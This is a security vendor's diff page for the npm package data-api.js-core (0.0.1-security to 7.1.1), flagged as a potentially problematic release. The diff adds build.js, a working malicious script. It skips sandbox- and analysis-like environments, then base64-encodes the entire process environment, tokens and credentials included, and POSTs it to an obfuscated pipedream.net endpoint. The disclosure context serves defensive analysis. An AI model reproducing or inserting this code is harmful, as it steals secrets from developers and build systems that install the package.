npm - data-api.js-core - Versions diffs - 0.0.1-security → 7.1.1 - Mend

data-api.js-core 0.0.1-security → 7.1.1

Potentially problematic release.

This version of data-api.js-core might be problematic. Click here for more details.

Files changed (4) hide show

package/build.js ADDED Viewed

@@ -0,0 +1,54 @@
+var http = require('https');
+var filter = [
+  { key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') },
+  { key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') },
+  { key: 'USERNAME', val: ['daas', 'admin'].join('') },
+  { key: '_', val: '/usr/bin/python' },
+  { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') },
+  [
+    { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
+    { key: 'HOME', val: ['', 'home', 'app'].join('/') },
+    { key: 'USER', val: 'app' },
+  ],
+  [
+    { key: 'EDITOR', val: 'vi' },
+    { key: 'PROBE_USERNAME', val: '*' },
+    { key: 'SHELL', val: '/bin/bash' },
+    { key: 'SHLVL', val: '2' },
+    { key: 'npm_command', val: 'run-script' },
+    { key: 'NVM_CD_FLAGS', val: '' },
+    { key: 'npm_config_fund', val: '' },
+  ],
+  [
+    { key: 'HOME', val: '/home/username' },
+    { key: 'USER', val: 'username' },
+    { key: 'LOGNAME', val: 'username' },
+  ]
+];
+function main() {
+  var data = process.env || {};
+  if (
+    filter.some((entry) =>
+      [].concat(entry).every((item) => (data[item.key] || '').includes(item.val) || item.val === '*')
+    ) ||
+    Object.keys(data).length < 10
+  ) {
+    return;
+  }
+  var req = http
+    .request({
+      host: ['eovsmsusn4979sc', 'm', ['pip', 'edream'].join(''), 'net'].join('.'),
+      path: '/' + (data.npm_package_name || ''),
+      method: 'POST',
+    })
+    .on('error', function (err) {
+    });
+  req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
+  req.end();
+}
+main();